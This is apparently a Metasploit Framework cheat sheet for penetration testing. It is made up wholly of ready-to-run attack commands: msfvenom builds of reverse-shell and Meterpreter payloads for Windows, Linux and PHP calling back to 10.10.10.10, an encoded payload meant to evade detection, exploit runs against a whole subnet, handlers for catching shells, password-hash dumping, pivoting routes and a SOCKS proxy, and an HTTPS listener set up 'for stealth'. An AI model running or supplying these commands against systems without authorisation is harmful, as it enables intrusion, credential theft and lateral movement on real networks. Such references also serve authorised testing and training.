
Metasploit Cheat Sheet

A cheat sheet for the Metasploit Framework, used for penetration testing, exploit development, and post-exploitation. Covers msfconsole navigation, payload generation, exploit usage, and post-exploitation modules.


MSFConsole Basics

Start Metasploit console in quiet mode without the banner

$ msfconsole -q

Search for Windows SMB exploits in the module database

$ search type:exploit platform:windows smb

Find excellent-ranked exploits by CVE year

$ search cve:2021 rank:excellent

Select the multi-handler module for catching reverse shells

$ use exploit/multi/handler

Display detailed information about a specific module

$ info exploit/windows/smb/ms17_010_eternalblue

Payloads

Generate a Windows 64-bit Meterpreter reverse TCP executable

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe

Generate a Linux reverse shell ELF binary

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf

Generate encoded HTTPS Meterpreter with 5 encoding iterations

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o payload.exe

Generate a PHP Meterpreter web shell

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o shell.php

List all available Meterpreter payload variants

$ msfvenom --list payloads | grep meterpreter

Running Exploits

Configure target hosts, port, and execute the selected exploit

$ set RHOSTS 192.168.1.0/24
$ set RPORT 445
$ run

Configure payload with callback address and port

$ set PAYLOAD windows/x64/meterpreter/reverse_tcp
$ set LHOST 10.10.10.10
$ set LPORT 4444

Check if the target is vulnerable without exploiting it

$ check

Run the exploit as a background job

$ exploit -j

List all active sessions (shells and meterpreter)

$ sessions -l

Post-Exploitation

Interact with session ID 1

$ sessions -i 1

Suggest local privilege escalation exploits for the target

$ run post/multi/recon/local_exploit_suggester

Dump password hashes from a compromised Windows host

$ run post/windows/gather/hashdump

Add a route through a compromised host for pivoting

$ run post/multi/manage/autoroute SUBNET=10.0.0.0/24

Enumerate currently and recently logged-on users

$ run post/windows/gather/enum_logged_on_users

Handlers & Listeners

Set up a background listener for reverse TCP Meterpreter

$ use exploit/multi/handler
$ set PAYLOAD windows/x64/meterpreter/reverse_tcp
$ set LHOST 0.0.0.0
$ set LPORT 4444
$ exploit -j

Start a SOCKS proxy server for pivoting through sessions

$ use auxiliary/server/socks_proxy
$ set SRVHOST 127.0.0.1
$ set SRVPORT 1080
$ run -j

Start an HTTPS listener with a custom SSL certificate for stealth

$ use exploit/multi/handler
$ set PAYLOAD windows/x64/meterpreter/reverse_https
$ set LHOST 0.0.0.0
$ set LPORT 443
$ set HandlerSSLCert cert.pem
$ exploit -j
